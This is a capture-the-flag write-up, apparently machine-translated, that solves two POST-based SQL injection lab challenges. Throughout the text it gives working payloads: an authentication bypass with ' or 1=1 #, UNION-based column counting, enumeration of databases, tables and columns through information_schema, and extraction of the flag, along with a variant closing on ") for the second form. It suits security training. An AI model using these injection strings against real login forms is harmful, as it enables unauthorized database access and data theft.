SQL injection-POST type

Range address
Principle:
POST injection is to use post to pass parameters, the user submits data and interacts with the database, and extracts useful information from the database

first question:

We first check the source
Insert picture description here code and run the code directly without doing any processing. Therefore, we only need to close the previous code of username, and then comment out the following code to achieve data interaction.

I enter in the account box

' or 1=1 #

Insert picture description here
Direct display
So, I to determine the number of fields to
sequentially input the code

'union select 1#

'union select 1,2#

'union select 1,2,3#

It is found that only the third one shows that the login is successful.
Insert picture description here So, the number of judgment fields is 3

Next, we use database() to query the database name: enter the code
and enter it in turn

'union select 1,2,database() limit 0,1 #

…

'union select 1,2,database() limit 9,1 #

Insert picture description here error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar

Query the database, post_error, and judge that the flag may be in it

So continue to enter the code

'union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #

Insert picture description here Find the flag

Continue to look up the table name:
enter the code

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1 #

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 1,1 #

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 2,1 #

Insert picture description here It is found that it has two column names:
flag
id,
then find the flag,
directly query the flag data,
enter the code

' union select 1,2,group_concat(flag) from flag#

Insert picture description here So get the flag

Second question

The method is the same, but its source code is different.
Insert picture description here We need to use

”) or 1=1 #

Insert picture description here The login is successful, there is a post injection vulnerability,
so I first judge the number of fields
and enter the code in turn

") union select 1#

")union select 1,2#

") union select 1,2,3#

There are three judgment fields.
Then, we use database() to query the database name: enter the code
and enter it in turn

")union select 1,2,database() limit 0,1 #

…

")union select 1,2,database() limit 9,1 #

Insert picture description here error
head_error
information_schema
kanwolongxia
mysql
performance_schema
post_error
sys
widechar
query to the database, post_error, judgment flag may be there

So continue to enter the code

") union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 #

It is found that it has two column names:
flag
id,
then find the flag,
directly query the flag data,
enter the code

") union select 1,2,group_concat(flag) from flag#

So I got the second question of flag